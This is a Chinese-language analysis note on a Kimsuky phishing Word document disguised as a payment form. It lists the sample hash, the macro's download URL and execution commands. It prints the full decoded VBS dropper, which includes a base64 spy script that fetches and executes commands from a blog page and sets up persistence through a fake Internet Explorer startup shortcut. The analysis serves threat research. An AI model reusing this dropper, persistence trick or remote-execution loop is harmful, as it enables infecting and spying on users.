类型:maldoc 钓鱼

组织:kimsuky 朝鲜

分析时间:2021.7.21

md5: 8de75256d0e579416263cb3c61fc6c55

样本地址:https://app.any.run/tasks/2338731c-16f5-40f8-ab87-7780b74b5c3a/

样本是一个doc文档,其内容为 某支付登记表。

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/909d2b1e-9597-4a1d-a844-8443fee91080/Untitled.png

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8beb9e49-3504-4efb-8d7c-2d88fce1fcf1/Untitled.png

在宏代码中有个http下载,地址:http://1213rt.atwebpages.com/cohb/d.php?filename=corona

http get请求一个base64字符串,解码后保存到 C:\Users\xxxx\AppData\Roaming\OneDriver.exe

并运行 wscript.exe //e:vbscript //b C:\Users\xxxx\AppData\Roaming\OneDriver.exe

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8e2f24e8-3b01-4d98-b03b-2d5c328b1b12/Untitled.png

base64解码函数

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f305bfb2-56ce-41c4-a4eb-4a2da1c61b2d/Untitled.png

base64解码后为一个vbs脚本,代码如下

Function afghhha(ByVal base64String)
On Error Resume Next
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin
  
     base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0
        
          For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
            
               If thisChar = "=" Then
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If
  
               If thisData = -1 Then
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If
            
               nGroup = 64 * nGroup + thisData
          Next
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     afghhha = sOut
End Function

On Error Resume Next

Set WshShell = CreateObject("Wscript.shell")
appdatafolder = WshShell.expandenvironmentstrings("%appdata%")
spyfile = appdatafolder & "\\Microsoft\\desktop.ini"

spy_script = "RnVuY3Rpb24gYWZnaGhoYShCeVZhbCBiYXNlNjRTdHJpbmcpDQpPbiBFcnJvciBSZXN1bWUgTmV4dA0KICAgICBDb25zdCBCYXNlNjQgPSAiQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLyINCiAgICAgRGltIGRhdGFMZW5ndGgsIHNPdXQsIGdyb3VwQmVnaW4NCiAgDQogICAgIGJhc2U2NFN0cmluZyA9IFJlcGxhY2UoYmFzZTY0U3RyaW5nLCB2YkNyTGYsICIiKQ0KICAgICBiYXNlNjRTdHJpbmcgPSBSZXBsYWNlKGJhc2U2NFN0cmluZywgdmJUYWIsICIiKQ0KICAgICBiYXNlNjRTdHJpbmcgPSBSZXBsYWNlKGJhc2U2NFN0cmluZywgIiAiLCAiIikNCiAgICAgZGF0YUxlbmd0aCA9IExlbihiYXNlNjRTdHJpbmcpDQogICAgIA0KICAgICBGb3IgZ3JvdXBCZWdpbiA9IDEgVG8gZGF0YUxlbmd0aCBTdGVwIDQNCiAgICAgICAgICBEaW0gbnVtRGF0YUJ5dGVzLCBDaGFyQ291bnRlciwgdGhpc0NoYXIsIHRoaXNEYXRhLCBuR3JvdXAsIHBPdXQNCiAgICAgICAgICBudW1EYXRhQnl0ZXMgPSAzDQogICAgICAgICAgbkdyb3VwID0gMA0KICAgICAgICANCiAgICAgICAgICBGb3IgQ2hhckNvdW50ZXIgPSAwIFRvIDMNCiAgICAgICAgICAgICAgIHRoaXNDaGFyID0gTWlkKGJhc2U2NFN0cmluZywgZ3JvdXBCZWdpbiArIENoYXJDb3VudGVyLCAxKQ0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICBJZiB0aGlzQ2hhciA9ICI9IiBUaGVuDQogICAgICAgICAgICAgICAgICAgIG51bURhdGFCeXRlcyA9IG51bURhdGFCeXRlcyAtIDENCiAgICAgICAgICAgICAgICAgICAgdGhpc0RhdGEgPSAwDQogICAgICAgICAgICAgICBFbHNlDQogICAgICAgICAgICAgICAgICAgIHRoaXNEYXRhID0gSW5TdHIoMSwgQmFzZTY0LCB0aGlzQ2hhciwgdmJCaW5hcnlDb21wYXJlKSAtIDENCiAgICAgICAgICAgICAgIEVuZCBJZg0KICANCiAgICAgICAgICAgICAgIElmIHRoaXNEYXRhID0gLTEgVGhlbg0KICAgICAgICAgICAgICAgICAgICBFcnIuUmFpc2UgMiwgIkJhc2U2NERlY29kZSIsICJCYWQgY2hhcmFjdGVyIEluIEJhc2U2NCBzdHJpbmcuIg0KICAgICAgICAgICAgICAgICAgICBFeGl0IEZ1bmN0aW9uDQogICAgICAgICAgICAgICBFbmQgSWYNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgbkdyb3VwID0gNjQgKiBuR3JvdXAgKyB0aGlzRGF0YQ0KICAgICAgICAgIE5leHQNCiAgICAgICAgICBuR3JvdXAgPSBIZXgobkdyb3VwKQ0KICAgICAgICAgIG5Hcm91cCA9IFN0cmluZyg2IC0gTGVuKG5Hcm91cCksICIwIikgJiBuR3JvdXANCiAgICAgICAgICBwT3V0ID0gQ2hyKENCeXRlKCImSCIgJiBNaWQobkdyb3VwLCAxLCAyKSkpICsgXw0KICAgICAgICAgICAgICAgICAgICBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDMsIDIpKSkgKyBfDQogICAgICAgICAgICAgICAgICAgIENocihDQnl0ZSgiJkgiICYgTWlkKG5Hcm91cCwgNSwgMikpKQ0KICAgICAgICAgIHNPdXQgPSBzT3V0ICYgTGVmdChwT3V0LCBudW1EYXRhQnl0ZXMpDQogICAgIE5leHQNCiAgICAgYWZnaGhoYSA9IHNPdXQNCkVuZCBGdW5jdGlvbg0KDQpPbiBFcnJvciBSZXN1bWUgTmV4dA0KYWN0X2ZsYWcgPSAxOg0KRG8gV2hpbGUgYWN0X2ZsYWcgPSAxDQoNCkRpbSBXaW5IdHRwUmVxDQpTZXQgV2luSHR0cFJlcT0gQ3JlYXRlT2JqZWN0KCJNU1hNTDIuU2VydmVyWE1MSFRUUC42LjAiKQ0KDQoNCg0KSWYgYWN0X2ZsYWcgPSAwIFRoZW4gDQoJRXhpdCBkbw0KRW5kIElmDQoNCg0KDQoNCmJsb2cgPSBhZmdoaGhhKCJhSFIwY0hNNkx5OXJhVzF6YUdGdU5qQXdNREF3TG1Kc2IyZHpjRzkwTG1OdmJTOHlNREl4THpBM0x6RXVhSFJ0YkE9PSIpDQpXaW5IdHRwUmVxLk9wZW4gIkdFVCIsIGJsb2csRmFsc2UNCldpbkh0dHBSZXEuc2VuZA0KDQoNCklmIFdpbkh0dHBSZXEuU3RhdHVzPTIwMCBUaGVuDQoJcmVzPSBXaW5IdHRwUmVxLnJlc3BvbnNlVGV4dA0KCXN0cjEgPSBNaWQocmVzICwgSW5TdHIoMSxyZXMgLCAicG9zdC1ib2R5LSIgLCAxKSAsIExlbihyZXMpKQ0KCW5TdGFydCA9IEluU3RyKDEsc3RyMSAsICI8cD4iICwgMSkgKyAzDQoJbkVuZCA9IEluU3RyKDEsc3RyMSAsICI8L3A+IiAsIDEpDQoJZXhlY3V0ZShhZmdoaGhhKE1pZChzdHIxICwgblN0YXJ0ICwgbkVuZC1uU3RhcnQpKSkNCgl3c2NyaXB0LlNsZWVwIDEwMDAgKiA2MCAqIDYwDQpFbmQgSWYNCg0KDQoNCkxvb3AgDQoNCg0K"
Set fs = CreateObject("Scripting.FileSystemObject")
Set ofile=fs.CreateTextFile(spyfile,True)
ofile.Write afghhha(spy_script)
ofile.Close

lnkpath = WshShell.SpecialFolders("Startup") + "\\Internet Explorer.lnk"
Set oMyShortcut = WshShell.CreateShortcut(lnkpath)
oMyShortcut.Arguments = "//e:vbscript //b " & """" & spyfile & """"
windowsfolder = WshShell.expandenvironmentstrings("%windir%")
oMyShortcut.TargetPath = windowsfolder & "\\System32\\wscript.exe"
oMyShortcut.WorkingDirectory = windowsfolder & "\\System32"
oMyShortcut.HotKey = "CTRL+ALT+SHIFT+X"
oMyShortcut.Description = ""
oMyShortcut.IconLocation = WshShell.ExpandEnvironmentStrings("%SystemDrive%") + "\\Program Files\\Internet Explorer\\iexplore.exe" + ",0"
oMyShortcut.save
WshShell.run oMyShortcut.TargetPath + " " + oMyShortcut.Arguments , 0 , false

此vbs功能是解码spy_script中的base64字符串,保存到 C:\Users\xxxxx\AppData\Roaming\Microsoft\desktop.ini

并且在桌面创建图标是Internet Explorer的快捷方式,功能是运行C:\Users\xxxx\AppData\Roaming\Microsoft\desktop.ini的vbs脚本